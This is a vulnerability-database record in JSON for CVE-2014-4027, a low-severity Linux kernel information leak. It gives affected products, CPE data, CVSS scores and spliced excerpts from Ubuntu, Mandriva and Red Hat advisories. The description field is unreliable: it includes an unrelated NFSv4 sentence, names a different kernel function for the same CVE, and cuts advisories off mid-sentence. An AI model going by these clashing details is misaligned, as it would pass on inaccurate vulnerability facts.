      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0230",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "enterprise manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-iq application delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-iq device",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-iq security",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-iq device",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.2.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-iq security",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.5.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "enterprise manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "3.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.0.0"
      },
      {
        "model": "big-ip protocol security module",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "linux enterprise real time extension",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.4.3"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.14",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:vmware:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_real_time_extension:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:*:-:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_high_availability_extension:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_application_delivery_controller:4.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_security:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_device:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_cloud:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:enterprise_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.1.1",
                "versionStartIncluding": "3.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_protocol_security_module:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.4.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.4.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "db": "PACKETSTORM",
        "id": "128091"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2014-4027",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.4,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:M/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2014-4027",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.4,
            "id": "VHN-71967",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:A/AC:M/AU:S/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-4027",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201406-527",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-71967",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The rd_build_device_space function in drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not properly initialize a certain data structure, which allows local users to obtain sensitive information from ramdisk_mcp memory by leveraging access to a SCSI initiator. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is due to the fact that the program does not initialize the data structure correctly. ============================================================================\nUbuntu Security Notice USN-2336-1\nSeptember 02, 2014\n\nlinux-lts-trusty vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-trusty: Linux hardware enablement kernel from Trusty\n\nDetails:\n\nA flaw was discovered in the Linux kernel virtual machine\u0027s (kvm)\nvalidation of interrupt requests (irq). A guest OS user could exploit this\nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAndy Lutomirski discovered a flaw in the authorization of netlink socket\noperations when a socket is passed to a process of more privilege. \n(CVE-2014-0181)\n\nAn information leak was discovered in the Linux kernels\naio_read_events_ring function. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel\u0027s shared memory\nsubsystem when used with range notifications and hole punching. (CVE-2014-4171)\n\nToralf F=C3=B6rster reported an error in the Linux kernels syscall auditing on\n32 bit x86 platforms. (CVE-2014-4667)\n\nVasily Averin discover a reference count flaw during attempts to umount in\nconjunction with a symlink. (CVE-2014-5045)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  linux-image-3.13.0-35-generic   3.13.0-35.62~precise1\n  linux-image-3.13.0-35-generic-lpae  3.13.0-35.62~precise1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2014:155\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : kernel\n Date    : August 7, 2014\n Affected: Business Server 1.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been found and corrected in the Linux\n kernel:\n \n Multiple buffer overflows in drivers/staging/wlags49_h2/wl_priv.c\n in the Linux kernel before 3.12 allow local users to cause a\n denial of service or possibly have unspecified other impact\n by leveraging the CAP_NET_ADMIN capability and providing a long\n station-name string, related to the (1) wvlan_uil_put_info and (2)\n wvlan_set_station_nickname functions (CVE-2013-4514). \n \n The Linux kernel before 3.15.4 on Intel processors does not properly\n restrict use of a non-canonical value for the saved RIP address in\n the case of a system call that does not use IRET, which allows local\n users to leverage a race condition and gain privileges, or cause\n a denial of service (double fault), via a crafted application that\n makes ptrace and fork system calls (CVE-2014-4699).  The verification\n of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFT4yfXmqjQ0CJFipgRAuk5AKDbuUKogDrhb4iKIs1yOP4IQdpAcwCgodf8\nOMQTfJFCDxSAMSI8iUevOkc=\n=mxBf\n-----END PGP SIGNATURE-----\n. (CVE-2014-4943)\n\nMichael S. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2014:1971-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1971.html\nIssue date:        2014-12-09\nCVE Names:         CVE-2013-2929 CVE-2014-1739 CVE-2014-3181 \n                   CVE-2014-3182 CVE-2014-3184 CVE-2014-3185 \n                   CVE-2014-3186 CVE-2014-3631 CVE-2014-3673 \n                   CVE-2014-3687 CVE-2014-3688 CVE-2014-4027 \n                   CVE-2014-4652 CVE-2014-4654 CVE-2014-4655 \n                   CVE-2014-4656 CVE-2014-5045 CVE-2014-6410 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix multiple security issues and several bugs\nare now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\n* A flaw was found in the way the Linux kernel\u0027s SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash the\nsystem. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel\u0027s SCTP implementation\nhandled the association\u0027s output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an excessive\namount of memory, leading to a denial of service. (CVE-2014-3688,\nImportant)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use these\nflaws to crash the system or, potentially, escalate their privileges on the\nsystem. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB Request\nBlocks buffers. An attacker with physical access to the system could use\nthis flaw to crash the system or, potentially, escalate their privileges on\nthe system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel\u0027s keys subsystem handled the\ntermination condition in the associative array garbage collection\nfunctionality. A local, unprivileged user could use this flaw to crash the\nsystem. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel\u0027s ALSA\nimplementation handled user controls. A local, privileged user could use\neither of these flaws to crash the system. (CVE-2014-4654, CVE-2014-4655,\nCVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel\u0027s VFS subsystem handled\nreference counting when performing unmount operations on symbolic links. \nA local, unprivileged user could use this flaw to exhaust all available\nmemory on the system or, potentially, trigger a use-after-free error,\nresulting in a system crash or privilege escalation. (CVE-2014-5045,\nModerate)\n\n* A flaw was found in the way the get_dumpable() function return value was\ninterpreted in the ptrace subsystem of the Linux kernel. When\n\u0027fs.suid_dumpable\u0027 was set to 2, a local, unprivileged local user could\nuse this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the way\nthe Linux kernel\u0027s UDF file system implementation processed indirect ICBs. \nAn attacker with physical access to the system could use a specially\ncrafted UDF image to crash the system. (CVE-2014-1739,\nLow)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver could\nallow an attacker with physical access to the system to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2014-3182,\nLow)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid HID\nreports. An attacker with physical access to the system could use either of\nthese flaws to write data past an allocated memory buffer. (CVE-2014-3184,\nLow)\n\n* An information leak flaw was 